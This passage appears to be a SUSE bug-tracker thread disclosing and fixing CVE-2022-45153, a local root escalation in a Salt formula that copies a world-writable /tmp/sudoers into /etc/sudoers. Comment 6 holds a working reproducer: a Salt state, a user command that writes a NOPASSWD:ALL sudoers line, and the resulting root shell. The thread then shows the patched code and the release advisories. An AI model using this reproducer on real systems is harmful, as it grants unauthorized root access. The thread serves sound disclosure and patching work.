66 - sudoers_backup_{{ sap_instance }}
67
68 sudoers_check_{{ sap_instance }}:
69 cmd.run:
70 - name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
71 - require:
72 - sudoers_append_{{ sap_instance }}
73
74 sudoers_edit_{{ sap_instance }}:
75 file.copy:
76 - name: {{ sudoers }}
77 - source: {{ tmp_sudoers }}
78 - force: true
79 - require:
80 - sudoers_check_{{ sap_instance }}
81 - stop_hana_{{ sap_instance }}
/tmp/sudoers can be written by arbitrary users. According to
https://docs.saltproject.io/en/latest/ref/states/all/salt.states.file.html#salt.states.file.copy
it will not overwrite existing files. I need to reproduce it (don't have a working salt setup ATM), but every user should be able to write a arbitrary sudoers, place it there and then this will copy it into /etc
CVE assignment and reproducer next week
Comment 3 Steven Stringer 2022-12-05 10:11:15 UTC
This issue has already been corrected and is currently awaiting release
SUSE:SLE-12-SP3:Update = IBS request 283896
SUSE:SLE-15:Update = IBS request 283894
SUSE:SLE-15-SP2:Update = IBS request 283895
Comment 4 Johannes Segitz 2022-12-05 12:21:52 UTC
Thanks, but please wait with this. This needs a CVE. I'm just reproducing it and then I'll assign a CVE
Comment 5 Johannes Segitz 2022-12-05 12:25:08 UTC
Please use CVE-2022-45153
Comment 6 Johannes Segitz 2022-12-05 12:28:01 UTC
Reproducer:
Create stripped down sls file at /usr/share/salt-formulas/states/ha_cluster_exploit.sls
{% set tmp_sudoers = '/tmp/sudoers' %}
{% set sudoers = '/etc/sudoers' %}
sudoers_backup:
file.copy:
- name: {{ tmp_sudoers }}
- source: {{ sudoers }}
- unless: cat {{ sudoers }} | grep adm
sudoers_append:
file.append:
- name: {{ tmp_sudoers }}
- text: |
adm ALL=(ALL) NOPASSWD: /usr/sbin/crm_attribute -n hana__site_srHook_*
- require:
- sudoers_backup
sudoers_check:
cmd.run:
- name: /usr/sbin/visudo -c -f {{ tmp_sudoers }}
- require:
- sudoers_append
sudoers_edit:
file.copy:
- name: {{ sudoers }}
- source: {{ tmp_sudoers }}
- force: true
- require:
- sudoers_check
as user run (change username)
echo 'johannes ALL=(ALL) NOPASSWD:ALL' > /tmp/sudoers
as root:
salt-call --local state.apply ha_cluster_exploit
then as user:
sudo su
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root)
Comment 7 Johannes Segitz 2022-12-05 12:29:27 UTC
can't be exploited by the user when this ran once as /tmp/sudoers stays and the users can't overwrite it.
Comment 8 Steven Stringer 2022-12-05 13:51:41 UTC
(In reply to Johannes Segitz from comment #5)
> Please use CVE-2022-45153
Use CVE for what?
Comment 9 Johannes Segitz 2022-12-05 16:07:40 UTC
For the changelog and for tracking this vulnerability internally and externally
Comment 10 Steven Stringer 2022-12-15 08:17:18 UTC
Here's the new code. A tmp file is no longer used and /etc/sudoers is no longer touched. A new file is created (/etc/sudoers.d/SAPHanaSR). To ensure that the new file doesn't break the sudoers config the command `/usr/sbin/visudo -c -f` is run.
```
sudoers_create_{{ sap_instance }}:
file.managed:
- source: salt://hana/templates/ha_cluster_sudoers.j2
- name: {{ sudoers }}
- template: jinja
- user: root
- group: root
- mode: 0440
- check_cmd: /usr/sbin/visudo -c -f
- require:
- pkg: install_SAPHanaSR
- context:
sid: {{ node.sid }}
sites: {{ sites }}
sr_hook: {{ sr_hook }}
sr_hook_multi_target: {{ sr_hook_multi_target }}
sr_hook_string: __slot__:salt:file.grep({{ sr_hook }}, "^srHookGen = ").stdout
sustkover_hook: {{ sustkover_hook }}
```
Full file here -> https://github.com/SUSE/saphanabootstrap-formula/blob/main/hana/ha_cluster.sls
Comment 11 Johannes Segitz 2022-12-15 09:12:10 UTC
looks good, thank you
Comment 12 Steven Stringer 2022-12-15 12:08:41 UTC
For your reference, I've added the CVE to the changelog and resubmitted the requests into ISB. Here are the request IDs.
SUSE:SLE-12-SP3:Update 286480
SUSE:SLE-15:Update 286481
SUSE:SLE-15-SP2:Update 286479
Comment 14 Swamp Workflow Management 2023-01-02 14:24:43 UTC
SUSE-SU-2023:0011-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Server for SAP 12-SP5 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
SUSE Linux Enterprise Server for SAP 12-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-4.18.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 15 Swamp Workflow Management 2023-01-02 14:25:26 UTC
SUSE-SU-2023:0010-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
SUSE Linux Enterprise Module for SAP Applications 15-SP1 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150000.1.19.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 16 Swamp Workflow Management 2023-01-02 14:30:39 UTC
SUSE-SU-2023:0009-1: An update that solves one vulnerability and has one errata is now available.
Category: security (important)
Bug References: 1185643,1205990
CVE References: CVE-2022-45153
JIRA References:
Sources used:
openSUSE Leap 15.4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
openSUSE Leap 15.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SUSE Manager Server 4.2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP4 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP3 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
SUSE Linux Enterprise Module for SAP Applications 15-SP2 (src): saphanabootstrap-formula-0.13.1+git.1667812208.4db963e-150200.3.15.1
NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
--------------------------------------------------------------------------------
* Format For Printing
* - XML
* - Clone This Bug
* - Top of page
First Last Prev Next This bug is not in your last search results.
* * Home
* | New
* | Browse
* | Search
* |
[?]
* | Reports
* | Requests
* | Help
* | Log In
[x]
* | Forgot Password
* Legal:
* openSUSE
* SUSE